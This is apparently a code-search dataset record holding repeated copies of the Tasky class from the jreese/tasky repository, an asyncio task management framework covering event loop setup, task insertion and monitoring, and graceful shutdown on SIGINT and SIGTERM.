debug: bool=False) -> None:
'''Initialize Tasky and automatically start a list of tasks.
One of the following methods must be called on the resulting objects
to start the event loop: `run_forever()`, `run_until_complete()`, or
`run_for_time()`.'''
if uvloop:
Log.debug('using uvloop event loop')
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
self.loop = asyncio.new_event_loop()
self.loop.add_signal_handler(signal.SIGINT, self.sigint)
self.loop.add_signal_handler(signal.SIGTERM, self.sigterm)
self.loop.set_exception_handler(self.exception)
asyncio.set_event_loop(self.loop)
if debug:
Log.debug('enabling asyncio debug mode')
self.loop.set_debug(True)
self.all_tasks = {}
self.running_tasks = set()
self.initial_tasks = list(task_list)
self.configuration = config
self.stats = stats
self.executor = executor
self.monitor = False
self.terminate_on_finish = False
self.stop_attempts = 0
@property
def config(self) -> Any:
'''Return configuration data for the root service.'''
return self.configuration.global_config()
@property
def counters(self) -> DictWrapper:
'''Dict-like structure for tracking global stats.'''
return self.stats.global_counter()
def task(self, name_or_class: Any) -> Task:
'''Return a running Task object matching the given name or class.'''
if name_or_class in self.all_tasks:
return self.all_tasks[name_or_class]
try:
return self.all_tasks.get(name_or_class.__class__.__name__, None)
except AttributeError:
return None
async def init(self) -> None:
'''Initialize configuration and start tasks.'''
self.stats = await self.insert(self.stats)
self.configuration = await self.insert(self.configuration)
if not self.executor:
try:
max_workers = self.config.get('executor_workers')
except Exception:
max_workers = None
self.executor = ThreadPoolExecutor(max_workers=max_workers)
for task in self.initial_tasks:
await self.insert(task)
self.monitor = asyncio.ensure_future(self.monitor_tasks())
self.counters['alive_since'] = time.time()
async def execute(self, fn, *args, **kwargs) -> None:
'''Execute an arbitrary function outside the event loop using
a shared Executor.'''
fn = functools.partial(fn, *args, **kwargs)
return await self.loop.run_in_executor(self.executor, fn)
def run_forever(self) -> None:
'''Execute the tasky/asyncio event loop until terminated.'''
Log.debug('running event loop until terminated')
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_until_complete(self) -> None:
'''Execute the tasky/asyncio event loop until all tasks finish.'''
Log.debug('running event loop until all tasks completed')
self.terminate_on_finish = True
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_for_time(self, duration: float=10.0) -> None:
'''Execute the tasky/asyncio event loop for `duration` seconds.'''
Log.debug('running event loop for %.1f seconds', duration)
try:
asyncio.ensure_future(self.init())
self.loop.run_until_complete(asyncio.sleep(duration))
self.terminate()
self.loop.run_forever()
except RuntimeError as e:
if not e.args[0].startswith('Event loop stopped'):
raise
finally:
self.loop.close()
def terminate(self, *, force: bool=False, timeout: float=30.0,
step: float=1.0) -> None:
'''Stop all scheduled and/or executing tasks, first by asking nicely,
and then by waiting up to `timeout` seconds before forcefully stopping
the asyncio event loop.'''
if isinstance(self.monitor, asyncio.Future):
Log.debug('cancelling task monitor')
self.monitor.cancel()
Log.debug('stopping tasks')
for task in list(self.running_tasks):
if task.task.done():
Log.debug('task %s already stopped', task.name)
self.running_tasks.discard(task)
else:
Log.debug('asking %s to stop', task.name)
asyncio.ensure_future(task.stop(force=force))
if timeout > 0 and (self.monitor or self.running_tasks):
Log.debug('waiting %.1f seconds for remaining tasks (%d)...',
timeout, len(self.running_tasks))
timeout -= step
fn = functools.partial(self.terminate, force=force,
timeout=timeout, step=step)
return self.loop.call_later(step, fn)
if timeout > 0:
Log.debug('all tasks completed, stopping event loop')
else:
Log.debug('timed out waiting for tasks, stopping event loop')
self.loop.stop()
async def start_task(self, task: Task) -> None:
'''Initialize the task, queue it for execution, add the done callback,
and keep track of it for when tasks need to be stopped.'''
try:
Log.debug('task %s starting', task.name)
before = time.time()
task.counters['last_run'] = before
task.running = True
self.running_tasks.add(task)
await task.run_task()
Log.debug('task %s completed', task.name)
except CancelledError:
Log.debug('task %s cancelled', task.name)
except Exception:
Log.exception('unhandled exception in task %s', task.name)
finally:
self.running_tasks.discard(task)
task.running = False
task.task = None
after = time.time()
total = after - before
task.counters['last_completed'] = after
task.counters['duration'] = total
async def monitor_tasks(self, interval: float=1.0) -> None:
'''Monitor all known tasks for run state. Ensure that enabled tasks
are running, and that disabled tasks are stopped.'''
Log.debug('monitor running')
while True:
try:
await asyncio.sleep(interval)
for name, task in self.all_tasks.items():
if self.terminate_on_finish:
if task in self.running_tasks and task.running:
await task.stop()
elif task.enabled:
if task not in self.running_tasks:
Log.debug('task %s enabled, restarting', task.name)
await self.insert(task)
else:
if task in self.running_tasks:
Log.debug('task %s disabled, stopping', task.name)
await task.stop()
if self.terminate_on_finish and not self.running_tasks:
Log.debug('all tasks completed, terminating')
break
except CancelledError:
Log.debug('monitor cancelled')
break
except Exception:
Log.exception('monitoring exception')
self.monitor = None
self.loop.call_later(0, self.terminate)
def exception(self, loop: asyncio.BaseEventLoop, context: dict) -> None:
'''Log unhandled exceptions from anywhere in the event loop.'''
Log.error('unhandled exception: %s', context['message'])
Log.error('%s', context)
if 'exception' in context:
Log.error(' %s', context['exception'])
def sigint(self) -> None:
'''Handle the user pressing Ctrl-C by stopping tasks nicely at first,
then forcibly upon further presses.'''
if self.stop_attempts < 1:
Log.info('gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
elif self.stop_attempts < 2:
Log.info('forcefully cancelling tasks')
self.stop_attempts += 1
self.terminate(force=True)
else:
Log.info('forcefully stopping event loop')
self.loop.stop()
def sigterm(self) -> None:
'''Handle SIGTERM from the system by stopping tasks gracefully.
Repeated signals will be ignored while waiting for tasks to finish.'''
if self.stop_attempts < 1:
Log.info('received SIGTERM, gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
else:
Log.info('received SIGTERM, bravely waiting for tasks')
|
jreese/tasky | tasky/loop.py | Tasky.execute | python | async def execute(self, fn, *args, **kwargs) -> None:
'''Execute an arbitrary function outside the event loop using
a shared Executor.'''
fn = functools.partial(fn, *args, **kwargs)
return await self.loop.run_in_executor(self.executor, fn) | Execute an arbitrary function outside the event loop using
a shared Executor. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/loop.py#L134-L139 | null | class Tasky(object):
'''Task management framework for asyncio'''
def __init__(self,
task_list: List[Task]=None,
config: Config=Config,
stats: Stats=Stats,
executor: Executor=None,
debug: bool=False) -> None:
'''Initialize Tasky and automatically start a list of tasks.
One of the following methods must be called on the resulting objects
to start the event loop: `run_forever()`, `run_until_complete()`, or
`run_for_time()`.'''
if uvloop:
Log.debug('using uvloop event loop')
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
self.loop = asyncio.new_event_loop()
self.loop.add_signal_handler(signal.SIGINT, self.sigint)
self.loop.add_signal_handler(signal.SIGTERM, self.sigterm)
self.loop.set_exception_handler(self.exception)
asyncio.set_event_loop(self.loop)
if debug:
Log.debug('enabling asyncio debug mode')
self.loop.set_debug(True)
self.all_tasks = {}
self.running_tasks = set()
self.initial_tasks = list(task_list)
self.configuration = config
self.stats = stats
self.executor = executor
self.monitor = False
self.terminate_on_finish = False
self.stop_attempts = 0
@property
def config(self) -> Any:
'''Return configuration data for the root service.'''
return self.configuration.global_config()
@property
def counters(self) -> DictWrapper:
'''Dict-like structure for tracking global stats.'''
return self.stats.global_counter()
def task(self, name_or_class: Any) -> Task:
'''Return a running Task object matching the given name or class.'''
if name_or_class in self.all_tasks:
return self.all_tasks[name_or_class]
try:
return self.all_tasks.get(name_or_class.__class__.__name__, None)
except AttributeError:
return None
async def init(self) -> None:
'''Initialize configuration and start tasks.'''
self.stats = await self.insert(self.stats)
self.configuration = await self.insert(self.configuration)
if not self.executor:
try:
max_workers = self.config.get('executor_workers')
except Exception:
max_workers = None
self.executor = ThreadPoolExecutor(max_workers=max_workers)
for task in self.initial_tasks:
await self.insert(task)
self.monitor = asyncio.ensure_future(self.monitor_tasks())
self.counters['alive_since'] = time.time()
async def insert(self, task: Task) -> None:
'''Insert the given task class into the Tasky event loop.'''
if not isinstance(task, Task):
task = task()
if task.name not in self.all_tasks:
task.tasky = self
self.all_tasks[task.name] = task
await task.init()
elif task != self.all_tasks[task.name]:
raise Exception('Duplicate task %s' % task.name)
if task.enabled:
task.task = asyncio.ensure_future(self.start_task(task))
self.running_tasks.add(task)
else:
task.task = None
return task
def run_forever(self) -> None:
'''Execute the tasky/asyncio event loop until terminated.'''
Log.debug('running event loop until terminated')
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_until_complete(self) -> None:
'''Execute the tasky/asyncio event loop until all tasks finish.'''
Log.debug('running event loop until all tasks completed')
self.terminate_on_finish = True
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_for_time(self, duration: float=10.0) -> None:
'''Execute the tasky/asyncio event loop for `duration` seconds.'''
Log.debug('running event loop for %.1f seconds', duration)
try:
asyncio.ensure_future(self.init())
self.loop.run_until_complete(asyncio.sleep(duration))
self.terminate()
self.loop.run_forever()
except RuntimeError as e:
if not e.args[0].startswith('Event loop stopped'):
raise
finally:
self.loop.close()
def terminate(self, *, force: bool=False, timeout: float=30.0,
step: float=1.0) -> None:
'''Stop all scheduled and/or executing tasks, first by asking nicely,
and then by waiting up to `timeout` seconds before forcefully stopping
the asyncio event loop.'''
if isinstance(self.monitor, asyncio.Future):
Log.debug('cancelling task monitor')
self.monitor.cancel()
Log.debug('stopping tasks')
for task in list(self.running_tasks):
if task.task.done():
Log.debug('task %s already stopped', task.name)
self.running_tasks.discard(task)
else:
Log.debug('asking %s to stop', task.name)
asyncio.ensure_future(task.stop(force=force))
if timeout > 0 and (self.monitor or self.running_tasks):
Log.debug('waiting %.1f seconds for remaining tasks (%d)...',
timeout, len(self.running_tasks))
timeout -= step
fn = functools.partial(self.terminate, force=force,
timeout=timeout, step=step)
return self.loop.call_later(step, fn)
if timeout > 0:
Log.debug('all tasks completed, stopping event loop')
else:
Log.debug('timed out waiting for tasks, stopping event loop')
self.loop.stop()
async def start_task(self, task: Task) -> None:
'''Initialize the task, queue it for execution, add the done callback,
and keep track of it for when tasks need to be stopped.'''
try:
Log.debug('task %s starting', task.name)
before = time.time()
task.counters['last_run'] = before
task.running = True
self.running_tasks.add(task)
await task.run_task()
Log.debug('task %s completed', task.name)
except CancelledError:
Log.debug('task %s cancelled', task.name)
except Exception:
Log.exception('unhandled exception in task %s', task.name)
finally:
self.running_tasks.discard(task)
task.running = False
task.task = None
after = time.time()
total = after - before
task.counters['last_completed'] = after
task.counters['duration'] = total
async def monitor_tasks(self, interval: float=1.0) -> None:
'''Monitor all known tasks for run state. Ensure that enabled tasks
are running, and that disabled tasks are stopped.'''
Log.debug('monitor running')
while True:
try:
await asyncio.sleep(interval)
for name, task in self.all_tasks.items():
if self.terminate_on_finish:
if task in self.running_tasks and task.running:
await task.stop()
elif task.enabled:
if task not in self.running_tasks:
Log.debug('task %s enabled, restarting', task.name)
await self.insert(task)
else:
if task in self.running_tasks:
Log.debug('task %s disabled, stopping', task.name)
await task.stop()
if self.terminate_on_finish and not self.running_tasks:
Log.debug('all tasks completed, terminating')
break
except CancelledError:
Log.debug('monitor cancelled')
break
except Exception:
Log.exception('monitoring exception')
self.monitor = None
self.loop.call_later(0, self.terminate)
def exception(self, loop: asyncio.BaseEventLoop, context: dict) -> None:
'''Log unhandled exceptions from anywhere in the event loop.'''
Log.error('unhandled exception: %s', context['message'])
Log.error('%s', context)
if 'exception' in context:
Log.error(' %s', context['exception'])
def sigint(self) -> None:
'''Handle the user pressing Ctrl-C by stopping tasks nicely at first,
then forcibly upon further presses.'''
if self.stop_attempts < 1:
Log.info('gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
elif self.stop_attempts < 2:
Log.info('forcefully cancelling tasks')
self.stop_attempts += 1
self.terminate(force=True)
else:
Log.info('forcefully stopping event loop')
self.loop.stop()
def sigterm(self) -> None:
'''Handle SIGTERM from the system by stopping tasks gracefully.
Repeated signals will be ignored while waiting for tasks to finish.'''
if self.stop_attempts < 1:
Log.info('received SIGTERM, gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
else:
Log.info('received SIGTERM, bravely waiting for tasks')
|
jreese/tasky | tasky/loop.py | Tasky.run_forever | python | def run_forever(self) -> None:
'''Execute the tasky/asyncio event loop until terminated.'''
Log.debug('running event loop until terminated')
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close() | Execute the tasky/asyncio event loop until terminated. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/loop.py#L141-L147 | [
"async def init(self) -> None:\n '''Initialize configuration and start tasks.'''\n\n self.stats = await self.insert(self.stats)\n self.configuration = await self.insert(self.configuration)\n\n if not self.executor:\n try:\n max_workers = self.config.get('executor_workers')\n exc... | class Tasky(object):
'''Task management framework for asyncio'''
def __init__(self,
task_list: List[Task]=None,
config: Config=Config,
stats: Stats=Stats,
executor: Executor=None,
debug: bool=False) -> None:
'''Initialize Tasky and automatically start a list of tasks.
One of the following methods must be called on the resulting objects
to start the event loop: `run_forever()`, `run_until_complete()`, or
`run_for_time()`.'''
if uvloop:
Log.debug('using uvloop event loop')
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
self.loop = asyncio.new_event_loop()
self.loop.add_signal_handler(signal.SIGINT, self.sigint)
self.loop.add_signal_handler(signal.SIGTERM, self.sigterm)
self.loop.set_exception_handler(self.exception)
asyncio.set_event_loop(self.loop)
if debug:
Log.debug('enabling asyncio debug mode')
self.loop.set_debug(True)
self.all_tasks = {}
self.running_tasks = set()
self.initial_tasks = list(task_list)
self.configuration = config
self.stats = stats
self.executor = executor
self.monitor = False
self.terminate_on_finish = False
self.stop_attempts = 0
@property
def config(self) -> Any:
'''Return configuration data for the root service.'''
return self.configuration.global_config()
@property
def counters(self) -> DictWrapper:
'''Dict-like structure for tracking global stats.'''
return self.stats.global_counter()
def task(self, name_or_class: Any) -> Task:
'''Return a running Task object matching the given name or class.'''
if name_or_class in self.all_tasks:
return self.all_tasks[name_or_class]
try:
return self.all_tasks.get(name_or_class.__class__.__name__, None)
except AttributeError:
return None
async def init(self) -> None:
'''Initialize configuration and start tasks.'''
self.stats = await self.insert(self.stats)
self.configuration = await self.insert(self.configuration)
if not self.executor:
try:
max_workers = self.config.get('executor_workers')
except Exception:
max_workers = None
self.executor = ThreadPoolExecutor(max_workers=max_workers)
for task in self.initial_tasks:
await self.insert(task)
self.monitor = asyncio.ensure_future(self.monitor_tasks())
self.counters['alive_since'] = time.time()
async def insert(self, task: Task) -> None:
'''Insert the given task class into the Tasky event loop.'''
if not isinstance(task, Task):
task = task()
if task.name not in self.all_tasks:
task.tasky = self
self.all_tasks[task.name] = task
await task.init()
elif task != self.all_tasks[task.name]:
raise Exception('Duplicate task %s' % task.name)
if task.enabled:
task.task = asyncio.ensure_future(self.start_task(task))
self.running_tasks.add(task)
else:
task.task = None
return task
async def execute(self, fn, *args, **kwargs) -> None:
'''Execute an arbitrary function outside the event loop using
a shared Executor.'''
fn = functools.partial(fn, *args, **kwargs)
return await self.loop.run_in_executor(self.executor, fn)
def run_until_complete(self) -> None:
'''Execute the tasky/asyncio event loop until all tasks finish.'''
Log.debug('running event loop until all tasks completed')
self.terminate_on_finish = True
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_for_time(self, duration: float=10.0) -> None:
'''Execute the tasky/asyncio event loop for `duration` seconds.'''
Log.debug('running event loop for %.1f seconds', duration)
try:
asyncio.ensure_future(self.init())
self.loop.run_until_complete(asyncio.sleep(duration))
self.terminate()
self.loop.run_forever()
except RuntimeError as e:
if not e.args[0].startswith('Event loop stopped'):
raise
finally:
self.loop.close()
def terminate(self, *, force: bool=False, timeout: float=30.0,
step: float=1.0) -> None:
'''Stop all scheduled and/or executing tasks, first by asking nicely,
and then by waiting up to `timeout` seconds before forcefully stopping
the asyncio event loop.'''
if isinstance(self.monitor, asyncio.Future):
Log.debug('cancelling task monitor')
self.monitor.cancel()
Log.debug('stopping tasks')
for task in list(self.running_tasks):
if task.task.done():
Log.debug('task %s already stopped', task.name)
self.running_tasks.discard(task)
else:
Log.debug('asking %s to stop', task.name)
asyncio.ensure_future(task.stop(force=force))
if timeout > 0 and (self.monitor or self.running_tasks):
Log.debug('waiting %.1f seconds for remaining tasks (%d)...',
timeout, len(self.running_tasks))
timeout -= step
fn = functools.partial(self.terminate, force=force,
timeout=timeout, step=step)
return self.loop.call_later(step, fn)
if timeout > 0:
Log.debug('all tasks completed, stopping event loop')
else:
Log.debug('timed out waiting for tasks, stopping event loop')
self.loop.stop()
async def start_task(self, task: Task) -> None:
'''Initialize the task, queue it for execution, add the done callback,
and keep track of it for when tasks need to be stopped.'''
try:
Log.debug('task %s starting', task.name)
before = time.time()
task.counters['last_run'] = before
task.running = True
self.running_tasks.add(task)
await task.run_task()
Log.debug('task %s completed', task.name)
except CancelledError:
Log.debug('task %s cancelled', task.name)
except Exception:
Log.exception('unhandled exception in task %s', task.name)
finally:
self.running_tasks.discard(task)
task.running = False
task.task = None
after = time.time()
total = after - before
task.counters['last_completed'] = after
task.counters['duration'] = total
async def monitor_tasks(self, interval: float=1.0) -> None:
'''Monitor all known tasks for run state. Ensure that enabled tasks
are running, and that disabled tasks are stopped.'''
Log.debug('monitor running')
while True:
try:
await asyncio.sleep(interval)
for name, task in self.all_tasks.items():
if self.terminate_on_finish:
if task in self.running_tasks and task.running:
await task.stop()
elif task.enabled:
if task not in self.running_tasks:
Log.debug('task %s enabled, restarting', task.name)
await self.insert(task)
else:
if task in self.running_tasks:
Log.debug('task %s disabled, stopping', task.name)
await task.stop()
if self.terminate_on_finish and not self.running_tasks:
Log.debug('all tasks completed, terminating')
break
except CancelledError:
Log.debug('monitor cancelled')
break
except Exception:
Log.exception('monitoring exception')
self.monitor = None
self.loop.call_later(0, self.terminate)
def exception(self, loop: asyncio.BaseEventLoop, context: dict) -> None:
'''Log unhandled exceptions from anywhere in the event loop.'''
Log.error('unhandled exception: %s', context['message'])
Log.error('%s', context)
if 'exception' in context:
Log.error(' %s', context['exception'])
def sigint(self) -> None:
'''Handle the user pressing Ctrl-C by stopping tasks nicely at first,
then forcibly upon further presses.'''
if self.stop_attempts < 1:
Log.info('gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
elif self.stop_attempts < 2:
Log.info('forcefully cancelling tasks')
self.stop_attempts += 1
self.terminate(force=True)
else:
Log.info('forcefully stopping event loop')
self.loop.stop()
def sigterm(self) -> None:
'''Handle SIGTERM from the system by stopping tasks gracefully.
Repeated signals will be ignored while waiting for tasks to finish.'''
if self.stop_attempts < 1:
Log.info('received SIGTERM, gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
else:
Log.info('received SIGTERM, bravely waiting for tasks')
|
jreese/tasky | tasky/loop.py | Tasky.run_until_complete | python | def run_until_complete(self) -> None:
'''Execute the tasky/asyncio event loop until all tasks finish.'''
Log.debug('running event loop until all tasks completed')
self.terminate_on_finish = True
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close() | Execute the tasky/asyncio event loop until all tasks finish. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/loop.py#L149-L156 | [
"async def init(self) -> None:\n '''Initialize configuration and start tasks.'''\n\n self.stats = await self.insert(self.stats)\n self.configuration = await self.insert(self.configuration)\n\n if not self.executor:\n try:\n max_workers = self.config.get('executor_workers')\n exc... | class Tasky(object):
'''Task management framework for asyncio'''
def __init__(self,
task_list: List[Task]=None,
config: Config=Config,
stats: Stats=Stats,
executor: Executor=None,
debug: bool=False) -> None:
'''Initialize Tasky and automatically start a list of tasks.
One of the following methods must be called on the resulting objects
to start the event loop: `run_forever()`, `run_until_complete()`, or
`run_for_time()`.'''
if uvloop:
Log.debug('using uvloop event loop')
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
self.loop = asyncio.new_event_loop()
self.loop.add_signal_handler(signal.SIGINT, self.sigint)
self.loop.add_signal_handler(signal.SIGTERM, self.sigterm)
self.loop.set_exception_handler(self.exception)
asyncio.set_event_loop(self.loop)
if debug:
Log.debug('enabling asyncio debug mode')
self.loop.set_debug(True)
self.all_tasks = {}
self.running_tasks = set()
self.initial_tasks = list(task_list)
self.configuration = config
self.stats = stats
self.executor = executor
self.monitor = False
self.terminate_on_finish = False
self.stop_attempts = 0
@property
def config(self) -> Any:
'''Return configuration data for the root service.'''
return self.configuration.global_config()
@property
def counters(self) -> DictWrapper:
'''Dict-like structure for tracking global stats.'''
return self.stats.global_counter()
def task(self, name_or_class: Any) -> Task:
'''Return a running Task object matching the given name or class.'''
if name_or_class in self.all_tasks:
return self.all_tasks[name_or_class]
try:
return self.all_tasks.get(name_or_class.__class__.__name__, None)
except AttributeError:
return None
async def init(self) -> None:
'''Initialize configuration and start tasks.'''
self.stats = await self.insert(self.stats)
self.configuration = await self.insert(self.configuration)
if not self.executor:
try:
max_workers = self.config.get('executor_workers')
except Exception:
max_workers = None
self.executor = ThreadPoolExecutor(max_workers=max_workers)
for task in self.initial_tasks:
await self.insert(task)
self.monitor = asyncio.ensure_future(self.monitor_tasks())
self.counters['alive_since'] = time.time()
async def insert(self, task: Task) -> None:
'''Insert the given task class into the Tasky event loop.'''
if not isinstance(task, Task):
task = task()
if task.name not in self.all_tasks:
task.tasky = self
self.all_tasks[task.name] = task
await task.init()
elif task != self.all_tasks[task.name]:
raise Exception('Duplicate task %s' % task.name)
if task.enabled:
task.task = asyncio.ensure_future(self.start_task(task))
self.running_tasks.add(task)
else:
task.task = None
return task
async def execute(self, fn, *args, **kwargs) -> None:
'''Execute an arbitrary function outside the event loop using
a shared Executor.'''
fn = functools.partial(fn, *args, **kwargs)
return await self.loop.run_in_executor(self.executor, fn)
def run_forever(self) -> None:
'''Execute the tasky/asyncio event loop until terminated.'''
Log.debug('running event loop until terminated')
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_for_time(self, duration: float=10.0) -> None:
'''Execute the tasky/asyncio event loop for `duration` seconds.'''
Log.debug('running event loop for %.1f seconds', duration)
try:
asyncio.ensure_future(self.init())
self.loop.run_until_complete(asyncio.sleep(duration))
self.terminate()
self.loop.run_forever()
except RuntimeError as e:
if not e.args[0].startswith('Event loop stopped'):
raise
finally:
self.loop.close()
def terminate(self, *, force: bool=False, timeout: float=30.0,
step: float=1.0) -> None:
'''Stop all scheduled and/or executing tasks, first by asking nicely,
and then by waiting up to `timeout` seconds before forcefully stopping
the asyncio event loop.'''
if isinstance(self.monitor, asyncio.Future):
Log.debug('cancelling task monitor')
self.monitor.cancel()
Log.debug('stopping tasks')
for task in list(self.running_tasks):
if task.task.done():
Log.debug('task %s already stopped', task.name)
self.running_tasks.discard(task)
else:
Log.debug('asking %s to stop', task.name)
asyncio.ensure_future(task.stop(force=force))
if timeout > 0 and (self.monitor or self.running_tasks):
Log.debug('waiting %.1f seconds for remaining tasks (%d)...',
timeout, len(self.running_tasks))
timeout -= step
fn = functools.partial(self.terminate, force=force,
timeout=timeout, step=step)
return self.loop.call_later(step, fn)
if timeout > 0:
Log.debug('all tasks completed, stopping event loop')
else:
Log.debug('timed out waiting for tasks, stopping event loop')
self.loop.stop()
async def start_task(self, task: Task) -> None:
'''Initialize the task, queue it for execution, add the done callback,
and keep track of it for when tasks need to be stopped.'''
try:
Log.debug('task %s starting', task.name)
before = time.time()
task.counters['last_run'] = before
task.running = True
self.running_tasks.add(task)
await task.run_task()
Log.debug('task %s completed', task.name)
except CancelledError:
Log.debug('task %s cancelled', task.name)
except Exception:
Log.exception('unhandled exception in task %s', task.name)
finally:
self.running_tasks.discard(task)
task.running = False
task.task = None
after = time.time()
total = after - before
task.counters['last_completed'] = after
task.counters['duration'] = total
async def monitor_tasks(self, interval: float=1.0) -> None:
'''Monitor all known tasks for run state. Ensure that enabled tasks
are running, and that disabled tasks are stopped.'''
Log.debug('monitor running')
while True:
try:
await asyncio.sleep(interval)
for name, task in self.all_tasks.items():
if self.terminate_on_finish:
if task in self.running_tasks and task.running:
await task.stop()
elif task.enabled:
if task not in self.running_tasks:
Log.debug('task %s enabled, restarting', task.name)
await self.insert(task)
else:
if task in self.running_tasks:
Log.debug('task %s disabled, stopping', task.name)
await task.stop()
if self.terminate_on_finish and not self.running_tasks:
Log.debug('all tasks completed, terminating')
break
except CancelledError:
Log.debug('monitor cancelled')
break
except Exception:
Log.exception('monitoring exception')
self.monitor = None
self.loop.call_later(0, self.terminate)
def exception(self, loop: asyncio.BaseEventLoop, context: dict) -> None:
'''Log unhandled exceptions from anywhere in the event loop.'''
Log.error('unhandled exception: %s', context['message'])
Log.error('%s', context)
if 'exception' in context:
Log.error(' %s', context['exception'])
def sigint(self) -> None:
'''Handle the user pressing Ctrl-C by stopping tasks nicely at first,
then forcibly upon further presses.'''
if self.stop_attempts < 1:
Log.info('gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
elif self.stop_attempts < 2:
Log.info('forcefully cancelling tasks')
self.stop_attempts += 1
self.terminate(force=True)
else:
Log.info('forcefully stopping event loop')
self.loop.stop()
def sigterm(self) -> None:
'''Handle SIGTERM from the system by stopping tasks gracefully.
Repeated signals will be ignored while waiting for tasks to finish.'''
if self.stop_attempts < 1:
Log.info('received SIGTERM, gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
else:
Log.info('received SIGTERM, bravely waiting for tasks')
|
jreese/tasky | tasky/loop.py | Tasky.run_for_time | python | def run_for_time(self, duration: float=10.0) -> None:
'''Execute the tasky/asyncio event loop for `duration` seconds.'''
Log.debug('running event loop for %.1f seconds', duration)
try:
asyncio.ensure_future(self.init())
self.loop.run_until_complete(asyncio.sleep(duration))
self.terminate()
self.loop.run_forever()
except RuntimeError as e:
if not e.args[0].startswith('Event loop stopped'):
raise
finally:
self.loop.close() | Execute the tasky/asyncio event loop for `duration` seconds. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/loop.py#L158-L173 | [
"async def init(self) -> None:\n '''Initialize configuration and start tasks.'''\n\n self.stats = await self.insert(self.stats)\n self.configuration = await self.insert(self.configuration)\n\n if not self.executor:\n try:\n max_workers = self.config.get('executor_workers')\n exc... | class Tasky(object):
'''Task management framework for asyncio'''
def __init__(self,
             task_list: List[Task]=None,
             config: Config=Config,
             stats: Stats=Stats,
             executor: Executor=None,
             debug: bool=False) -> None:
    '''Initialize Tasky and automatically start a list of tasks.

    One of the following methods must be called on the resulting objects
    to start the event loop: `run_forever()`, `run_until_complete()`, or
    `run_for_time()`.

    Args:
        task_list: tasks to insert on startup (None means no tasks).
        config: Config task class or instance providing configuration.
        stats: Stats task class or instance tracking counters.
        executor: Executor for `execute()`; a ThreadPoolExecutor is
            created lazily in `init()` when omitted.
        debug: enable asyncio debug mode on the new event loop.
    '''
    # Prefer uvloop's faster loop implementation when it is installed.
    if uvloop:
        Log.debug('using uvloop event loop')
        asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())

    self.loop = asyncio.new_event_loop()
    self.loop.add_signal_handler(signal.SIGINT, self.sigint)
    self.loop.add_signal_handler(signal.SIGTERM, self.sigterm)
    self.loop.set_exception_handler(self.exception)
    asyncio.set_event_loop(self.loop)

    if debug:
        Log.debug('enabling asyncio debug mode')
        self.loop.set_debug(True)

    self.all_tasks = {}        # name -> Task, every task ever inserted
    self.running_tasks = set() # tasks currently scheduled/executing
    # Bug fix: task_list defaults to None and list(None) raises
    # TypeError; treat a missing task list as "no initial tasks".
    self.initial_tasks = list(task_list or [])
    self.configuration = config
    self.stats = stats
    self.executor = executor
    self.monitor = False
    self.terminate_on_finish = False
    self.stop_attempts = 0
@property
def config(self) -> Any:
    '''Configuration data for the root service (delegates to the
    Config task inserted during init()).'''
    root_config = self.configuration.global_config()
    return root_config
@property
def counters(self) -> DictWrapper:
    '''Dict-like structure for tracking global stats (delegates to
    the Stats task inserted during init()).'''
    global_counters = self.stats.global_counter()
    return global_counters
def task(self, name_or_class: Any) -> Task:
    '''Return a running Task object matching the given name or class.

    Accepts a task name (string), a Task subclass, or a Task instance;
    returns None when no matching task is registered.'''
    # Fast path: the argument is itself a registered task name.
    if name_or_class in self.all_tasks:
        return self.all_tasks[name_or_class]

    # Bug fix: the previous code used name_or_class.__class__.__name__
    # unconditionally, which for a *class* argument yields the metaclass
    # name ('type'), never the class's own name.  Use __name__ when the
    # argument is a class; otherwise fall back to its type's name.
    name = getattr(name_or_class, '__name__', None)
    if name is None:
        name = type(name_or_class).__name__
    return self.all_tasks.get(name, None)
async def init(self) -> None:
    '''Initialize configuration and start tasks.

    Order matters: the stats and configuration tasks are inserted first
    so that `self.config` is usable when sizing the executor and before
    any user task runs.  insert() returns the constructed Task instance,
    so the class attributes are rebound to instances here.'''
    self.stats = await self.insert(self.stats)
    self.configuration = await self.insert(self.configuration)

    if not self.executor:
        try:
            # Pool size comes from configuration when available.
            max_workers = self.config.get('executor_workers')
        except Exception:
            # Config may not expose get(); use the default pool size.
            max_workers = None
        self.executor = ThreadPoolExecutor(max_workers=max_workers)

    for task in self.initial_tasks:
        await self.insert(task)

    # Watchdog that restarts enabled tasks and stops disabled ones.
    self.monitor = asyncio.ensure_future(self.monitor_tasks())
    self.counters['alive_since'] = time.time()
async def insert(self, task: Task) -> Task:
    '''Insert the given task class (or instance) into the Tasky event
    loop and return the (possibly newly constructed) Task instance.

    Raises:
        Exception: if a *different* task with the same name is already
            registered.
    '''
    # Accept either a Task instance or a Task subclass to instantiate.
    if not isinstance(task, Task):
        task = task()

    if task.name not in self.all_tasks:
        task.tasky = self
        self.all_tasks[task.name] = task
        await task.init()
    elif task != self.all_tasks[task.name]:
        raise Exception('Duplicate task %s' % task.name)

    if task.enabled:
        task.task = asyncio.ensure_future(self.start_task(task))
        self.running_tasks.add(task)
    else:
